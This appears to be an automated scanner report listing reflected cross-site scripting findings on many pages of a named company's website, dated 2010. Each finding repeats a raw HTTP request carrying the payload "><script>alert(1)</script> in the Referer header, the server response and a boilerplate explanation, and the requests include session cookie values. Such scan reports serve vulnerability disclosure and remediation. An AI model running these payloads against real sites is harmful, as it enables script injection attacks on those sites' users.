GET /offering/functional_testing.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=f0fc2"><script>alert(1)</script>5fc2e29b4d5
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=FBADDBCF5E6CEC8F2D5E26E93BC0572A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:22 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db0a"><script>alert(1)</script>84ce9a5a0e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/index.jsp?source=google&adgroup=IT%20Consulting&campaign=Custom%20Development-2%20words&bucket=custom_software&url=IT_Consulting_Firms&kw=%2Bit%20%2Bconsulting&_kk=%2Bit%20%2Bconsulting&_kt=cea72c54-2388-40de-9373-9042768fd159/x22 HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3db0a"><script>alert(1)</script>84ce9a5a0e5
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=2F9A60FA2AAEB9A22CB26233EE670D2D; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 01:57:22 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40329"><script>alert(1)</script>19d057f992 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/index.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=40329"><script>alert(1)</script>19d057f992
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=3A428153001D9A51801C9FD56D81F23D; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 01:57:14 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe39"><script>alert(1)</script>594975ea401 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/java_technology.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=7fe39"><script>alert(1)</script>594975ea401
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=76DD5225731457316DE0A9FB68B56712; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:37 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf2e"><script>alert(1)</script>14d9c77f1c8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/load_testing.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=abf2e"><script>alert(1)</script>14d9c77f1c8
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=694A24ED09AACEF72E41BB986C0FD26E; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:22 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52cdb"><script>alert(1)</script>33801c0f125 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/net_technology.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=52cdb"><script>alert(1)</script>33801c0f125
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=307E90FFC0442BE36FD8860E131A631C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:38 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9769e"><script>alert(1)</script>deb1eefefba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/offshoring_roi.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=9769e"><script>alert(1)</script>deb1eefefba
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=E107FE4BE6F9B36D9D7BA654DEAB98B4; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:35 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c061"><script>alert(1)</script>a41ee51967e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/outsourcing.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=1c061"><script>alert(1)</script>a41ee51967e
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=C631D74BA73EE1F707AE9967B3C3A9C0; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:27 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69ff0"><script>alert(1)</script>3221b272123 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/overview.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=69ff0"><script>alert(1)</script>3221b272123
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=13167D6DC66BC69C74ABB94ED765506D; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:12 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39e04"><script>alert(1)</script>2c3c6b4cdb8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/plan_outsource.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=39e04"><script>alert(1)</script>2c3c6b4cdb8
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=098F040ABCFFA1F5917AF59EAA626FF0; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:32 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dc1"><script>alert(1)</script>96727b3a003 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/privacy_policy.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=74dc1"><script>alert(1)</script>96727b3a003
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=F89FE16F0BA8B796868B8E11F4EC2752; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:46 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f35c5"><script>alert(1)</script>b9fb4f7a0ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/product_maintenance.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=f35c5"><script>alert(1)</script>b9fb4f7a0ad
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=E2E1BF8E5F02B05783218B3F41834626; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:15 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9b1"><script>alert(1)</script>0259b515a97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/sharepoint.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=5c9b1"><script>alert(1)</script>0259b515a97
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=FF43081B33468777606F1FAF63CF7866; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:39 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edad"><script>alert(1)</script>0ba55d0d919 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/software_development.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=3edad"><script>alert(1)</script>0ba55d0d919
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=4E5FA50F3BE550EF165F7E29198E1198; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:15 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 362f5"><script>alert(1)</script>2e6d71ba93e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/technologies.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=362f5"><script>alert(1)</script>2e6d71ba93e
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=7D6988C2F114C2F1F785A7152152EE68; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:38 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f020"><script>alert(1)</script>b17272ef422 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/test_automation.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=1f020"><script>alert(1)</script>b17272ef422
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=2991AD408540FB832C0F5F00565DC581; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:22 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60ef1"><script>alert(1)</script>f384fbadadb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/test_planning.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=60ef1"><script>alert(1)</script>f384fbadadb
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=10C5FF1E07912AC8A93BF8AE6F869F5D; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:20 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96606"><script>alert(1)</script>00a2febc873 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/testing_lab.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=96606"><script>alert(1)</script>00a2febc873
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=2E67CF61C660463CD8FB3A16D5F04BB1; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:25 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d6a0"><script>alert(1)</script>b47e2381196 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/testing_services.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=9d6a0"><script>alert(1)</script>b47e2381196
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=7B60ABA54D79252B0DE982B30CBC9F8B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:18 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c756d"><script>alert(1)</script>e218d5cba4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/thankyou.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=c756d"><script>alert(1)</script>e218d5cba4d
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=F62EDCE8C12B7C64F6EB622F79D1CAC1; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:46 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77850"><script>alert(1)</script>ddd21a01333 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
